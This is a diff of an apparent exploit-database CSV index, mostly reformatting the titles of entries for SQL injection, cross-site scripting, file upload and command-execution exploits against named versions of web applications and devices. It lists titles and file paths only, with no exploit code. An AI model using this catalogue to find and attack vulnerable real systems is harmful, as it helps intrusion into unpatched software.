Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 34854,platforms/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,php,webapps,80 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",php,webapps,80 @@ -34237,8 +34248,8 @@ id,file,description,date,author,platform,type,port 34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 -34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 -34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 +34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 +34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - search.php bn Parameter Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 @@ -34301,11 +34312,11 @@ id,file,description,date,author,platform,type,port 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 35012,platforms/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 +35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - 'member.php' Multiple Parameter SQL Injection / Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 - 'index.php' Multiple Parameter Cross-Site Scripting",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 35026,platforms/php/webapps/35026.txt,"Joomla! Component 'com_storedirectory' - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0 -35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injection",2010-11-26,ali_err0r,php,webapps,0 +35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injections",2010-11-26,ali_err0r,php,webapps,0 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0 35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps,0 35035,platforms/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0 @@ -34369,7 +34380,7 @@ id,file,description,date,author,platform,type,port 35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80 35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80 35116,platforms/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting",2010-12-15,"Richard Brain",php,webapps,0 -35117,platforms/php/webapps/35117.txt,"Blog:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting",2010-12-15,"High-Tech Bridge SA",php,webapps,0 +35117,platforms/php/webapps/35117.txt,"Blog:CMS 4.2.1 e - Multiple HTML Injections / Cross-Site Scripting",2010-12-15,"High-Tech Bridge SA",php,webapps,0 35118,platforms/php/webapps/35118.txt,"PHPRS - 'model-kits.php' SQL Injection",2010-12-16,KnocKout,php,webapps,0 35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 35121,platforms/php/webapps/35121.txt,"Social Share - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -34426,7 +34437,7 @@ id,file,description,date,author,platform,type,port 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0 -35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php rate Parameter' SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 +35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php' 'rate' Parameter SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35218,platforms/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 @@ -34483,7 +34494,7 @@ id,file,description,date,author,platform,type,port 35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums 9.5 - Multiple SQL Injections",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 - SQL Injection / Information Disclosure",2011-02-03,"Ignacio Garrido",php,webapps,0 35312,platforms/php/webapps/35312.txt,"Firebook - 'index.html' Cross-Site Scripting",2011-02-03,MustLive,php,webapps,0 -35567,platforms/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injection",2011-04-05,"High-Tech Bridge SA",php,webapps,0 +35567,platforms/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Inclusion",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' Parameter SQL Injection",2011-02-07,NoNameMT,php,webapps,0 35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection",2011-02-08,"High-Tech Bridge SA",php,webapps,0 @@ -34491,7 +34502,7 @@ id,file,description,date,author,platform,type,port 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 -35325,platforms/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 +35325,platforms/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0 @@ -34518,7 +34529,7 @@ id,file,description,date,author,platform,type,port 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 -35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter' SQL Injection",2014-11-25,bard,php,webapps,80 +35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php' 'words_exact Parameter SQL Injection",2014-11-25,bard,php,webapps,80 35367,platforms/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35371,platforms/php/webapps/35371.txt,"WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 @@ -34559,7 +34570,7 @@ id,file,description,date,author,platform,type,port 35431,platforms/php/webapps/35431.txt,"Ruubikcms 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps,0 35435,platforms/php/webapps/35435.txt,"WordPress Plugin Lazyest Gallery 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0 -35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 +35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 @@ -34567,7 +34578,7 @@ id,file,description,date,author,platform,type,port 35447,platforms/php/webapps/35447.txt,"WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 35451,platforms/php/webapps/35451.txt,"BoutikOne - categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35452,platforms/php/webapps/35452.txt,"BoutikOne - list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35453,platforms/php/webapps/35453.txt,"BoutikOne - search.php Multiple Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 +35453,platforms/php/webapps/35453.txt,"BoutikOne - 'search.php' Multiple Parameter SQL Injections",2011-03-14,cdx.security,php,webapps,0 35454,platforms/php/webapps/35454.txt,"BoutikOne - rss_news.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35455,platforms/php/webapps/35455.txt,"BoutikOne - rss_flash.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35456,platforms/php/webapps/35456.txt,"BoutikOne - rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 @@ -34595,17 +34606,17 @@ id,file,description,date,author,platform,type,port 35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injections",2014-12-10,Portcullis,php,webapps,80 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 -35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection",2011-03-24,"High-Tech Bridge SA",php,webapps,0 +35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injections",2011-03-24,"High-Tech Bridge SA",php,webapps,0 35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 - 'skin' Parameter Cross-Site Scripting",2011-03-24,"AutoSec Tools",php,webapps,0 35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' Parameter HTML Injection",2011-03-25,"Zero Science Lab",php,webapps,0 -35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection",2011-04-27,"Alberto Revelli",jsp,webapps,0 +35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections",2011-04-27,"Alberto Revelli",jsp,webapps,0 35673,platforms/php/webapps/35673.txt,"WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35674,platforms/php/webapps/35674.txt,"WordPress Plugin WP Photo Album 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35675,platforms/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps,0 35676,platforms/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",cgi,webapps,0 35505,platforms/php/webapps/35505.txt,"WordPress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 -35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0 +35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injections",2011-03-27,MustLive,php,webapps,0 35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0 35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0 40817,platforms/java/webapps/40817.txt,"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting",2016-11-22,"Julien Ahrens",java,webapps,0 @@ -34619,17 +34630,17 @@ id,file,description,date,author,platform,type,port 35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",php,webapps,0 35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 - URI Cross-Site Scripting",2011-03-29,"Mesut Timur",php,webapps,0 35524,platforms/php/webapps/35524.txt,"XOOPS - 'view_photos.php' Cross-Site Scripting",2011-03-29,KedAns-Dz,php,webapps,0 -35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injection",2011-03-30,"kurdish hackers team",php,webapps,0 +35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injections",2011-03-30,"kurdish hackers team",php,webapps,0 35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0 -35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass",2014-12-15,LiquidWorm,windows,webapps,0 +35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass",2014-12-15,LiquidWorm,windows,webapps,0 35533,platforms/php/webapps/35533.py,"WordPress Plugin Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35535,platforms/php/webapps/35535.php,"PHPads 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 35561,platforms/php/webapps/35561.txt,"WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Parameter Cross-Site Scripting",2011-04-04,"John Leitch",php,webapps,0 35562,platforms/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Parameter Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 -35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 +35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 35543,platforms/php/webapps/35543.txt,"WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 @@ -34648,7 +34659,7 @@ id,file,description,date,author,platform,type,port 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php category Parameter' SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 +35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35596,platforms/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 @@ -34668,7 +34679,7 @@ id,file,description,date,author,platform,type,port 35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 35618,platforms/php/webapps/35618.txt,"RunCMS Module Partners - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 -35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0 +35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections",2011-04-16,KedAns-Dz,php,webapps,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"phpList 3.0.6 / 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 @@ -34731,7 +34742,7 @@ id,file,description,date,author,platform,type,port 35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 35721,platforms/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",hardware,webapps,80 35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 -35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection",2011-05-01,"AutoSec Tools",php,webapps,0 +35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35726,platforms/php/webapps/35726.py,"Getsimple 3.0 - 'set' Parameter Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 @@ -34740,7 +34751,7 @@ id,file,description,date,author,platform,type,port 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' Parameter SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 -35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injection",2011-05-10,"High-Tech Bridge SA",php,webapps,0 +35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 @@ -34748,7 +34759,7 @@ id,file,description,date,author,platform,type,port 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 -35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 +35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injections",2011-05-16,KedAns-Dz,php,webapps,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 @@ -34777,7 +34788,7 @@ id,file,description,date,author,platform,type,port 35808,platforms/php/webapps/35808.txt,"S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,php,webapps,0 35815,platforms/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 -35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection",2011-06-01,"High-Tech Bridge SA",php,webapps,0 +35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections",2011-06-01,"High-Tech Bridge SA",php,webapps,0 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 35823,platforms/php/webapps/35823.txt,"WordPress Plugin Pie Register 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 @@ -34844,14 +34855,14 @@ id,file,description,date,author,platform,type,port 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 35916,platforms/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 -35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 +35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injections",2011-07-02,Net.Edit0r,asp,webapps,0 35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 35929,platforms/php/webapps/35929.txt,"Joomla! Component 'com_voj' - SQL Injection",2011-07-08,CoBRa_21,php,webapps,0 35930,platforms/php/webapps/35930.txt,"Prontus CMS - 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0 35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0 